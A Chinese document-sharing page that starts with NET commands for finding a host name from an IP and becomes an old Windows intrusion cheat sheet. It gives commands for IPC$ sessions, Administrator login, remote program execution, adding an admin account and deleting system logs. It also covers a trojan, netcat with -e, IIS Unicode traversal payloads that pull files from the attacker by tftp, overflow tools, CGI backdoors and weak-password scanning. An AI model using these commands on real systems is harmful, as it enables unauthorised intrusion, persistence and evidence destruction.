您好,欢迎访问三七文档
当前位置:首页 > 临时分类 > 通过IP查询计算机名
常用的几条NET命令:1.知道对方ip查看对方的计算机名方法:开始-运行-cmd-netview对方ip或者开始-运行-cmd-nbtstat-a对方ip2.知道对方计算机名查看对方ip方法:开始-运行-cmd-ping对方计算机名或者开始-运行-cmd-nbtstat-a对方计算机名(与远程主机建立空管连接)netuse\\IP地址\ipc$/use:(以管理员身份登录远程主机)netuse\\IP地址\ipc$密码/use:Administrator(传送文件到远程主机WINNT目录下)copy本机目录路径\程序\\IP地址\admin$(查看远程主机时间)nettime\\IP地址(定时启动某个程序)at\\IP地址02:18readme.exe(查看共享)netview\\IP地址(查看netbios工作组列表)nbtstat-AIP地址(将远程主机C盘映射为自己的F盘)netusef:\\IP地址\c$/user:Administrator(这两条把自己增加到管理员组):netuser用户名密码/addnetlocalgroupAdministrators用户名/add(断开连接)netuse\\IP地址\ipc$/delete擦屁屁:delC:\winnt\system32\logfiles\*.*delC:\winnt\system32\config\*.evtdelC:\winnt\system32\dtclog\*.*delC:\winnt\system32\*.logdelC:\winnt\system32\*.txtdelC:\winnt\*.txtdelC:\winnt\*.log============================一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc/list\\IP地址netsvcschedule\\IP地址/querynetsvc\\IP地址schedule/start二、OpenTelnet.exe远程启动主机的Telnet服务,并绑定端口到7878,例如:OpenTelnet\\IP地址用户名密码17878然后就可以telnet到主机的7878端口,进入DOS方式下:telnetIP地址7878三、winshell.exe一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:pPath(查看winshell主程序的路径信息)breBoot(重新启动机器)dshutDown(关闭机器)sShell(执行后你就会看到可爱的“C:\”)xeXit(退出本次登录会话,此命令并不终止winshell的运行)CMDhttp://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)四、3389登陆器,GUI方式登录远程主机的五、elsave.exe事件日志清除工具elsave-s\\IP地址-lapplication-Celsave-s\\IP地址-lsystem-Celsave-s\\IP地址-lsecurity-C执行后成功清除应用程序日志,系统日志,安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot[/r]使用/r表示安装完成后自动重起目标使设置生效。七、nc.exe(netcat.exe)一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。想要连接到某处:nc[-options]hostnameport[s][ports]...绑定端口等待连接:nc-l-pport[-options][hostname][port]参数:-eprog程序重定向,一旦连接,就执行[危险!!]-ggatewaysource-routinghoppoint[s],upto8-Gnumsource-routingpointer:4,8,12,...-h帮助信息-isecs延时的间隔-l监听模式,用于入站连接-n指定数字的IP地址,不能用hostname-ofile记录16进制的传输-pport本地端口号-r任意指定本地及远程端口-saddr本地源地址-uUDP模式-v详细输出——用两个-v可得到更详细的内容-wsecstimeout的时间-z将输入输出关掉——用于扫描时八、TFTPD32.EXE把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本机IP地址get文件名c:\winnt\system32\文件名然后可以直接令文件运行:地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。一、一Xscan命令行运行参数说明:在检测过程中,按[空格]键可以查看各线程状态及扫描进度,按q键保存当前数据后提前退出程序,按强行关闭程序。1.命令格式:xscan-host[-][其他选项]xscan-file[其他选项]其中含义如下:-port:检测常用服务的端口状态(可通过\dat\config.ini文件的PORT-SCAN-OPTIONS\PORT-LIST项定制待检测端口列表);-ftp:检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);-ntpass:检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);-cgi:检测CGI漏洞(可通过\dat\config.ini文件的CGI-ENCODE\encode_type项设置编码方案);-iis:检测IIS漏洞(可通过\dat\config.ini文件的CGI-ENCODE\encode_type项设置编码方案);[其他选项]含义如下:-v:显示详细扫描进度-p:跳过Ping不通的主机-o:跳过没有检测到开放端口的主机-t:指定最大并发线程数量和并发主机数量,默认数量为100,10
本文标题:通过IP查询计算机名
链接地址:https://www.777doc.com/doc-6340017 .html